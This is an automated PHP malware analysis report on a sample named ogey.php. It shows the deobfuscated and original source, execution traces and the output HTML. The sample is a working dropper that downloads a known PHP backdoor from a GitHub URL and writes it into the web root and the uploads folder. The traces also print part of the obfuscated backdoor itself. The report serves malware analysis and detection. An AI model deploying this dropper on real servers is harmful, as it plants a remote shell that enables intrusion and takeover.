PHP Malware Analysis
ogey.php
md5: e9dda5020ad6a5fc38ff81b0067341c4
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- getcwd (Deobfuscated, Original, Traces)
Files
- file_get_contents (Deobfuscated, Original)
URLs
- http://localhost/0byte.php (HTML, Traces)
- http://localhost/uploads/0byte.php (Traces)
- https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php (Deobfuscated, Original, Traces)
Deobfuscated PHP code
<?php
/*
403 FORBIDDEN BYPASS
WITH BACKDOOR RECALL / SHELL SUMMON
*/
$source = "https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php";
$name = "0byte.php";
function _doEvil($name, $file)
{
$filename = $name;
$getFile = file_get_contents($file);
$rootPath = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR;
$toRootFopen = fopen("{$rootPath}/{$filename}", 'w');
$toRootExec = fwrite($toRootFopen, $getFile);
$rootShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://{$_SERVER['HTTP_HOST']}" . "/{$filename}";
$realPath = getcwd() . DIRECTORY_SEPARATOR;
$toRealFopen = fopen("{$realPath}/{$filename}", 'w');
$toRealExec = fwrite($toRealFopen, $getFile);
$realShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://{$_SERVER['HTTP_HOST']}" . dirname($_SERVER[REQUEST_URI]) . "/{$filename}";
echo "<center>";
if ($toRootExec) {
if (file_exists($rootPath . "{$filename}")) {
echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"{$rootShellUrl}\" target=\"_blank\">{$rootShellUrl}</a></font></h1>";
} else {
echo "<h1><font color=\"red\">{$rootPath}{$filename}<br>Doesn't exist!</font>Try with another method!</h1>";
}
} else {
if ($toRealExec) {
if (file_exists($realPath . "{$filename}")) {
echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"{$realShellUrl}\" target=\"_blank\">{$realShellUrl}</a></font></h1>";
} else {
echo "<h1><font color=\"red\">FAILED!</font></h1>";
}
}
}
echo "</center>";
}
_doEvil($name, $source);
?>
Execution traces
data/traces/e9dda5020ad6a5fc38ff81b0067341c4_trace-1676261664.073.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:14:49.970869]
1 0 1 0.000141 393512
1 3 0 0.000246 406296 {main} 1 /var/www/html/uploads/ogey.php 0 0
1 A /var/www/html/uploads/ogey.php 6 $source = 'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
1 A /var/www/html/uploads/ogey.php 7 $name = '0byte.php'
2 4 0 0.000293 406296 _doEvil 1 /var/www/html/uploads/ogey.php 41 2 '0byte.php' 'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
2 A /var/www/html/uploads/ogey.php 10 $filename = '0byte.php'
3 5 0 0.000322 406296 file_get_contents 0 /var/www/html/uploads/ogey.php 11 1 'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
3 5 1 0.039632 422312
3 5 R '<?php\n\n/*\n 0 b y t 3 m 1 n 1 - 2.2\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir = "\\x72\\x6d\\x6'
2 A /var/www/html/uploads/ogey.php 11 $getFile = '<?php\n\n/*\n 0 b y t 3 m 1 n 1 - 2.2\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir = "\\x72\\x6d\\x6'
2 A /var/www/html/uploads/ogey.php 12 $rootPath = '/var/www/html/'
3 6 0 0.039956 422368 fopen 0 /var/www/html/uploads/ogey.php 13 2 '/var/www/html//0byte.php' 'w'
3 6 1 0.040074 422912
3 6 R resource(5) of type (stream)
2 A /var/www/html/uploads/ogey.php 13 $toRootFopen = resource(5) of type (stream)
3 7 0 0.040125 422784 fwrite 0 /var/www/html/uploads/ogey.php 14 2 resource(5) of type (stream) '<?php\n\n/*\n 0 b y t 3 m 1 n 1 - 2.2\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir = "\\x72\\x6d\\x6'
3 7 1 0.040235 422848
3 7 R 9202
2 A /var/www/html/uploads/ogey.php 14 $toRootExec = 9202
2 A /var/www/html/uploads/ogey.php 15 $rootShellUrl = 'http://localhost/0byte.php'
3 8 0 0.040348 422840 getcwd 0 /var/www/html/uploads/ogey.php 16 0
3 8 1 0.040372 422888
3 8 R '/var/www/html/uploads'
2 A /var/www/html/uploads/ogey.php 16 $realPath = '/var/www/html/uploads/'
3 9 0 0.040414 422952 fopen 0 /var/www/html/uploads/ogey.php 17 2 '/var/www/html/uploads//0byte.php' 'w'
3 9 1 0.040469 423504
3 9 R resource(6) of type (stream)
2 A /var/www/html/uploads/ogey.php 17 $toRealFopen = resource(6) of type (stream)
3 10 0 0.040514 423368 fwrite 0 /var/www/html/uploads/ogey.php 18 2 resource(6) of type (stream) '<?php\n\n/*\n 0 b y t 3 m 1 n 1 - 2.2\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir = "\\x72\\x6d\\x6'
3 10 1 0.040602 423432
3 10 R 9202
2 A /var/www/html/uploads/ogey.php 18 $toRealExec = 9202
3 11 0 0.040668 423416 dirname 0 /var/www/html/uploads/ogey.php 19 1 '/uploads/ogey.php'
3 11 1 0.040691 423496
3 11 R '/uploads'
2 A /var/www/html/uploads/ogey.php 19 $realShellUrl = 'http://localhost/uploads/0byte.php'
3 12 0 0.040737 423480 file_exists 0 /var/www/html/uploads/ogey.php 22 1 '/var/www/html/0byte.php'
3 12 1 0.040770 423520
3 12 R TRUE
2 4 1 0.040802 407104
1 3 1 0.040815 407104
0.040876 326936
TRACE END [2023-02-13 02:14:50.011634]
Generated HTML code
<html><head></head><body><center><h1><font color="#00FF00">[OK!] <a href="http://localhost/0byte.php" target="_blank">http://localhost/0byte.php</a></font></h1></center>
</body></html>Original PHP code
<?php
/*
403 FORBIDDEN BYPASS
WITH BACKDOOR RECALL / SHELL SUMMON
*/
$source = "https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php";
$name = "0byte.php";
function _doEvil($name, $file) {
$filename = $name;
$getFile = file_get_contents($file);
$rootPath = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR;
$toRootFopen = fopen("$rootPath/$filename",'w');
$toRootExec = fwrite($toRootFopen, $getFile);
$rootShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://$_SERVER[HTTP_HOST]"."/$filename";
$realPath = getcwd().DIRECTORY_SEPARATOR;
$toRealFopen = fopen("$realPath/$filename",'w');
$toRealExec = fwrite($toRealFopen, $getFile);
$realShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://$_SERVER[HTTP_HOST]".dirname($_SERVER[REQUEST_URI])."/$filename";
echo "<center>";
if($toRootExec) {
if(file_exists($rootPath."$filename")) {
echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"$rootShellUrl\" target=\"_blank\">$rootShellUrl</a></font></h1>";
}
else {
echo "<h1><font color=\"red\">$rootPath$filename<br>Doesn't exist!</font>Try with another method!</h1>";
}
}
else {
if($toRealExec) {
if(file_exists($realPath."$filename")) {
echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"$realShellUrl\" target=\"_blank\">$realShellUrl</a></font></h1>";
}
else {
echo "<h1><font color=\"red\">FAILED!</font></h1>";
}
}
}
echo "</center>";
}
_doEvil($name, $source);
?>